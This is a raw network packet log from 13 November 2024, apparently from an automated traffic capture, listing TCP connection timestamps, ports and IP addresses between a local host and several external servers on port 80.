                                                                                      Nov 13, 2024 09:27:55.320631027 CET805905867.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:27:55.320693016 CET5905880192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:27:55.328007936 CET5905880192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:27:55.332895041 CET805905867.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:27:55.994162083 CET805905867.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:27:56.034507990 CET5905880192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:27:56.048886061 CET805905867.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:27:56.048944950 CET5905880192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:27:56.831547976 CET5905880192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:27:57.849940062 CET5906980192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:27:57.854918957 CET805906967.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:27:57.855096102 CET5906980192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:27:57.863544941 CET5906980192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:27:57.868521929 CET805906967.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:27:58.555423975 CET805906967.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:27:58.597029924 CET5906980192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:27:58.599807024 CET805906967.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:27:58.599889994 CET5906980192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:27:59.378449917 CET5906980192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:28:00.396677017 CET5908580192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:28:00.401555061 CET805908567.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:28:00.401627064 CET5908580192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:28:00.412889004 CET5908580192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:28:00.417800903 CET805908567.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:28:00.417839050 CET805908567.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:28:00.417846918 CET805908567.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:28:00.417853117 CET805908567.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:28:00.417885065 CET805908567.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:28:00.417936087 CET805908567.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:28:00.417943001 CET805908567.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:28:00.417973995 CET805908567.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:28:00.418028116 CET805908567.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:28:01.387176991 CET805908567.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:28:01.387265921 CET805908567.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:28:01.387326002 CET5908580192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:28:01.387388945 CET805908567.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:28:01.387428999 CET5908580192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:28:01.387871981 CET805908567.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:28:01.387912989 CET5908580192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:28:01.925231934 CET5908580192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:28:02.943579912 CET5910180192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:28:02.948672056 CET805910167.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:28:02.948749065 CET5910180192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:28:02.955741882 CET5910180192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:28:02.960638046 CET805910167.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:28:03.628504992 CET805910167.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:28:03.666904926 CET805910167.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:28:03.667072058 CET5910180192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:28:03.667804956 CET5910180192.168.2.467.223.117.142
                                                                                      Nov 13, 2024 09:28:03.672765017 CET805910167.223.117.142192.168.2.4
                                                                                      Nov 13, 2024 09:28:08.693131924 CET5910280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:28:08.698095083 CET80591023.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:08.698158979 CET5910280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:28:08.706906080 CET5910280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:28:08.711852074 CET80591023.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:09.323456049 CET80591023.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:09.323525906 CET5910280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:28:10.222332954 CET5910280192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:28:10.227343082 CET80591023.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:11.240638018 CET5910380192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:28:11.245815039 CET80591033.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:11.245903969 CET5910380192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:28:11.254400015 CET5910380192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:28:11.259238958 CET80591033.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:11.872092962 CET80591033.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:11.872164011 CET5910380192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:28:12.769078016 CET5910380192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:28:13.079747915 CET80591033.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:13.786799908 CET5910480192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:28:13.791799068 CET80591043.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:13.791889906 CET5910480192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:28:13.799452066 CET5910480192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:28:13.804526091 CET80591043.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:13.804557085 CET80591043.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:13.804589987 CET80591043.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:13.804616928 CET80591043.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:13.804645061 CET80591043.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:13.804696083 CET80591043.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:13.804723024 CET80591043.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:13.804749966 CET80591043.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:13.804776907 CET80591043.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:15.300345898 CET5910480192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:28:15.305943012 CET80591043.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:15.306006908 CET5910480192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:28:16.318320036 CET5910580192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:28:17.193919897 CET80591053.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:17.194183111 CET5910580192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:28:17.199978113 CET5910580192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:28:17.205073118 CET80591053.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:17.826349974 CET80591053.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:17.826849937 CET80591053.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:17.827028990 CET5910580192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:28:17.829051971 CET5910580192.168.2.43.33.130.190
                                                                                      Nov 13, 2024 09:28:17.833914995 CET80591053.33.130.190192.168.2.4
                                                                                      Nov 13, 2024 09:28:22.866614103 CET5910680192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:22.871520996 CET8059106113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:22.871696949 CET5910680192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:22.883877039 CET5910680192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:22.888850927 CET8059106113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:23.952790022 CET8059106113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:24.003472090 CET5910680192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:24.192914963 CET8059106113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:24.193121910 CET5910680192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:24.394172907 CET5910680192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:25.412266970 CET5910780192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:25.417726040 CET8059107113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:25.418204069 CET5910780192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:25.425424099 CET5910780192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:25.430418968 CET8059107113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:26.498707056 CET8059107113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:26.550389051 CET5910780192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:26.743676901 CET8059107113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:26.743788958 CET5910780192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:26.950336933 CET5910780192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:27.961184978 CET5910880192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:27.966440916 CET8059108113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:27.966689110 CET5910880192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:27.977755070 CET5910880192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:27.982939959 CET8059108113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:27.984385014 CET8059108113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:27.984400988 CET8059108113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:27.984412909 CET8059108113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:27.984425068 CET8059108113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:27.984436035 CET8059108113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:27.984447956 CET8059108113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:27.984458923 CET8059108113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:27.984589100 CET8059108113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:29.091928959 CET8059108113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:29.144201040 CET5910880192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:29.362560034 CET8059108113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:29.362736940 CET5910880192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:29.488096952 CET5910880192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:30.506159067 CET5910980192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:30.511358023 CET8059109113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:30.511626005 CET5910980192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:30.516690016 CET5910980192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:30.521501064 CET8059109113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:31.599441051 CET8059109113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:31.644067049 CET5910980192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:31.843637943 CET8059109113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:31.843741894 CET5910980192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:31.844469070 CET5910980192.168.2.4113.20.119.31
                                                                                      Nov 13, 2024 09:28:31.849313974 CET8059109113.20.119.31192.168.2.4
                                                                                      Nov 13, 2024 09:28:37.254849911 CET5911080192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:37.259731054 CET805911047.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:37.259804010 CET5911080192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:37.267333984 CET5911080192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:37.272367954 CET805911047.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:38.252922058 CET805911047.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:38.300688982 CET5911080192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:38.457912922 CET805911047.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:38.458091021 CET5911080192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:38.769227028 CET5911080192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:39.787014008 CET5911180192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:39.792035103 CET805911147.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:39.792260885 CET5911180192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:39.799820900 CET5911180192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:39.804672003 CET805911147.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:40.792073965 CET805911147.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:40.832104921 CET5911180192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:40.992166042 CET805911147.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:40.992499113 CET5911180192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:41.300518036 CET5911180192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:42.318381071 CET5911280192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:42.323422909 CET805911247.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:42.323543072 CET5911280192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:42.330967903 CET5911280192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:42.335863113 CET805911247.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:42.335916042 CET805911247.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:42.335927963 CET805911247.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:42.335939884 CET805911247.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:42.335962057 CET805911247.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:42.336081028 CET805911247.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:42.336096048 CET805911247.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:42.336169958 CET805911247.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:42.336219072 CET805911247.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:43.362481117 CET805911247.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:43.409754038 CET5911280192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:43.581118107 CET805911247.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:43.581258059 CET5911280192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:43.831679106 CET5911280192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:44.854983091 CET5911380192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:44.860085011 CET805911347.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:44.860234022 CET5911380192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:44.866463900 CET5911380192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:44.871387959 CET805911347.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:45.854818106 CET805911347.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:45.910008907 CET5911380192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:46.065396070 CET805911347.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:46.065546989 CET5911380192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:46.066365957 CET5911380192.168.2.447.129.103.185
                                                                                      Nov 13, 2024 09:28:46.071209908 CET805911347.129.103.185192.168.2.4
                                                                                      Nov 13, 2024 09:28:51.125096083 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:51.130554914 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:51.130764008 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:51.137970924 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:51.143369913 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:51.797152996 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:51.797168016 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:51.797214985 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:51.797221899 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:51.797225952 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:51.797233105 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:51.797303915 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:51.797312021 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:51.797319889 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:51.797362089 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:51.797362089 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:51.797363043 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:51.797456980 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:51.797517061 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:51.802371025 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:51.802437067 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:51.802445889 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:51.802505016 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:51.802592039 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:51.802640915 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:51.829184055 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:51.829207897 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:51.829371929 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.064184904 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064286947 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064297915 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064313889 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064342976 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064363956 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064377069 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064373016 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.064373016 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.064461946 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.064563036 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064615011 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.064708948 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064718962 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064730883 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064742088 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064764023 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064769030 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.064788103 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.064789057 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.064843893 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.065210104 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065221071 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065232038 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065243006 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065263987 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065269947 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.065275908 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065299034 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065304041 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.065325975 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.065787077 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065798044 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065808058 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065829992 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065834999 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.065854073 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065855980 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.065876961 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.065886021 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.065927982 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.069386959 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.069466114 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.069478035 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.069530964 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.069653034 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.069710970 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.069740057 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.069796085 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.069807053 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.069848061 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.069951057 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.069962025 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.069972992 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.070003033 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.070035934 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.070681095 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.070739985 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.070750952 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.070794106 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.070895910 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.070908070 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.070919037 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.070955038 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.070988894 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.071697950 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.071708918 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.071718931 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.071767092 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.071815968 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.071827888 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.071839094 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.071876049 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.071908951 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.072581053 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.072650909 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.072663069 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.072710037 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.072753906 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.072765112 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.072773933 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.072810888 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.072844982 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.073586941 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.073597908 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.073606968 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.073643923 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.073734999 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.073745012 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.073755026 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.073780060 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.073813915 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.074410915 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.074474096 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.074484110 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.074611902 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.074624062 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.074634075 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.074639082 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.074675083 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.074675083 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.075371027 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.075437069 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.075447083 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.075490952 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.075586081 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.075596094 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.075604916 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.075640917 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.075675011 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.076296091 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.128648043 CET5911480192.168.2.438.47.237.27
